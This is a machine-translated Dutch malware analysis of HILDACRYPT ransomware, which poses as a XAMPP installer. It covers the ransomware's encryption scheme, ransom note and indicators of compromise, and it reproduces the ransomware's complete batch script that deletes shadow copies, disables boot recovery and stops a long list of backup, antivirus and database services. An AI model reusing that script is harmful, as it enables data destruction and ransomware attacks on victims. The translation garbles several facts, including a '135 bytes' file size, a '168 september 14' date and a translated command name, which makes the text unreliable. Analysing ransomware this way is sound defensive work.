Hallo, Habr! Nogmaals, we hebben het over de nieuwste versies van malware uit de categorie Ransomware. HILDACRYPT is een nieuwe ransomware, ontdekt door een lid van de Hilda-familie in augustus 2019, genoemd naar de Netflix-tekenfilm die werd gebruikt om de software te verspreiden. Vandaag maken we kennis met de technische kenmerken van dit bijgewerkte ransomware-virus.
In de eerste versie van de Hilda-ransomware werd een link naar een versie op YouTube geplaatst tekenfilmserie was opgenomen in de losgeldbrief. HILDACRYPT doet zich voor als een legitiem XAMPP-installatieprogramma, een eenvoudig te installeren Apache-distributie die MariaDB, PHP en Perl bevat. Tegelijkertijd heeft de cryptolocker een andere bestandsnaam: xamp. Bovendien heeft het ransomwarebestand geen elektronische handtekening.
Statische analyse
De ransomware bevindt zich in een PE32 .NET-bestand geschreven voor MS Windows. De grootte is 135 bytes. Zowel de hoofdprogrammacode als de Defender-programmacode zijn geschreven in C#. Volgens de compilatiedatum en tijdstempel is het binaire bestand gemaakt op 168 september 14.
Volgens Detect It Easy wordt de ransomware gearchiveerd met behulp van Confuser en ConfuserEx, maar deze obfuscators zijn hetzelfde als voorheen. Alleen ConfuserEx is de opvolger van Confuser, dus hun codehandtekeningen zijn vergelijkbaar.
HILDACRYPT is inderdaad verpakt met ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Aanvalsvector
Hoogstwaarschijnlijk werd de ransomware ontdekt op een van de webprogrammeersites, vermomd als een legitiem XAMPP-programma.
De hele infectieketen is zichtbaar .
Verduistering
De ransomwarereeksen worden in gecodeerde vorm opgeslagen. Wanneer het wordt gelanceerd, decodeert HILDACRYPT ze met behulp van Base64 en AES-256-CBC.
installatie
Allereerst creëert de ransomware een map in %AppDataRoaming% waarin de GUID-parameter (Globally Unique Identifier) willekeurig wordt gegenereerd. Door een bat-bestand aan deze locatie toe te voegen, start het ransomware-virus het met behulp van cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat en afsluiten
Vervolgens begint het met het uitvoeren van een batchscript om systeemfuncties of -services uit te schakelen.
Het script bevat een lange lijst met opdrachten die schaduwkopieën vernietigen, de SQL-server uitschakelen, back-up- en antivirusoplossingen.
Het probeert bijvoorbeeld tevergeefs de Acronis Backup-services te stoppen. Bovendien valt het back-upsystemen en antivirusoplossingen van de volgende leveranciers aan: Veeam, Sophos, Kaspersky, McAfee en anderen.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Zodra de hierboven genoemde services en processen zijn uitgeschakeld, verzamelt de cryptolocker informatie over alle actieve processen met behulp van de opdracht Takenlijst om ervoor te zorgen dat alle noodzakelijke services niet beschikbaar zijn.
takenlijst v/fo csv
Met deze opdracht wordt een gedetailleerde lijst met actieve processen weergegeven, waarvan de elementen worden gescheiden door het teken “,”.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Na deze controle begint de ransomware met het versleutelingsproces.
Versleuteling
Versleuteling van bestanden
HILDACRYPT doorzoekt alle gevonden inhoud van harde schijven, behalve de mappen Recycle.Bin en Reference AssembliesMicrosoft. Deze laatste bevat kritische dll-, pdb-, enz.-bestanden voor .Net-applicaties die de werking van de ransomware kunnen beïnvloeden. Om te zoeken naar bestanden die worden gecodeerd, wordt de volgende lijst met extensies gebruikt:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
De ransomware gebruikt het AES-256-CBC-algoritme om gebruikersbestanden te versleutelen. De sleutelgrootte is 256 bits en de grootte van de initialisatievector (IV) is 16 bytes.
In de volgende schermafbeelding zijn de waarden van byte_2 en byte_1 willekeurig verkregen met behulp van GetBytes().
sleutel
IN EN
Het gecodeerde bestand heeft de extensie HCY!.. Dit is een voorbeeld van een gecodeerd bestand. De hierboven genoemde sleutel en IV zijn voor dit bestand gemaakt.
Sleutelversleuteling
De cryptolocker slaat de gegenereerde AES-sleutel op in een gecodeerd bestand. Het eerste deel van het gecodeerde bestand heeft een header die gegevens bevat zoals HILDACRYPT, KEY, IV, FileLen in XML-formaat, en ziet er als volgt uit:
AES- en IV-sleutelversleuteling gebeurt met behulp van RSA-2048, en codering gebeurt met Base64. De publieke RSA-sleutel wordt opgeslagen in de body van de cryptolocker in een van de gecodeerde strings in XML-formaat.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Er wordt een openbare RSA-sleutel gebruikt om de AES-bestandssleutel te coderen. De publieke RSA-sleutel is Base64-gecodeerd en bestaat uit een modulus en een publieke exponent van 65537. Voor decodering is de privé-RSA-sleutel nodig, waarover de aanvaller beschikt.
Na RSA-codering wordt de AES-sleutel gecodeerd met behulp van Base64, opgeslagen in het gecodeerde bestand.
Bericht over losgeld
Zodra de codering is voltooid, schrijft HILDACRYPT het html-bestand naar de map waarin de bestanden zijn gecodeerd. In de ransomwaremelding staan twee e-mailadressen waarop het slachtoffer contact kan opnemen met de aanvaller.
De afpersingsaankondiging bevat ook de regel “No loli is safe;)” - een verwijzing naar anime- en mangakarakters met het uiterlijk van kleine meisjes die in Japan verboden zijn.
Uitgang
HILDACRYPT, een nieuwe ransomwarefamilie, heeft een nieuwe versie uitgebracht. Het versleutelingsmodel voorkomt dat het slachtoffer de door de ransomware versleutelde bestanden kan ontsleutelen. Cryptolocker gebruikt actieve beveiligingsmethoden om beveiligingsservices met betrekking tot back-upsystemen en antivirusoplossingen uit te schakelen. De auteur van HILDACRYPT is fan van de animatieserie die Hilda op Netflix vertoonde, waarvan de link naar de trailer in de uitkoopbrief voor de vorige versie van het programma stond.
Zoals gewoonlijk, и kan uw computer beschermen tegen HILDACRYPT-ransomware, en providers hebben de mogelijkheid om hun klanten te beschermen . Bescherming wordt verzekerd door het feit dat deze oplossingen omvatten omvat niet alleen back-up, maar ook ons geïntegreerde beveiligingssysteem - Aangedreven door een machine learning-model en gebaseerd op gedragsheuristieken, een technologie die als geen ander in staat is de dreiging van zero-day ransomware tegen te gaan.
Indicatoren van compromis
Bestandsextensie HCY!
HILDACRYPTReadMe.html
xamp.exe met één letter "p" en geen digitale handtekening
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Bron: www.habr.com